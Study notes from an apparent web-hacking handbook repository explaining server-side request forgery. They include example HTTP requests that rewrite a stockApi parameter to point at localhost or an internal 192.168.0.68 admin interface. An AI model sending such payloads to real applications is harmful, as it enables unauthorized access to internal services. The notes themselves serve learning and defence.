handbook/tools/3.Web-Hacking/4.Injection/SSRF/Notes/2.Common-Attacks.md at main

x/handbook

Fork 0

Anton Nesterov af9011411c

vault backup: 2024-08-31 01:07:21

2024-08-31 01:07:22 +02:00

1.2 KiB

Raw Permalink Blame History

Common Attacks

Attacks Against the Server Itself

Attacker induces the application to make an HTTP request back to the server that is hosting the application (via loopback)
Involves supplying the URL with a hostname like 127.0.0.1 or localhost
Example code -- shopping application that allows user to check stock

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D
6%26storeId%3D1

- Makes request to the URL
- Retrieves the stock status
- Return to the user

Modify this for an attack:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://localhost/admin

- Server fetches contents of the /admin url and returns to the user
- Authenticates as the machine/server itself

Attacks Against Other Systems

Assume there is an administrative interface at https://192.168.0.68/admin
Attack can exploit and access this:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-
urlencoded
Content-Length: 118
stockApi=http://192.168.0.68/admin

Circumventing Common SSRF Defenses

1.2 KiB Raw Permalink Blame History

Common Attacks

1.2 KiB

Raw Permalink Blame History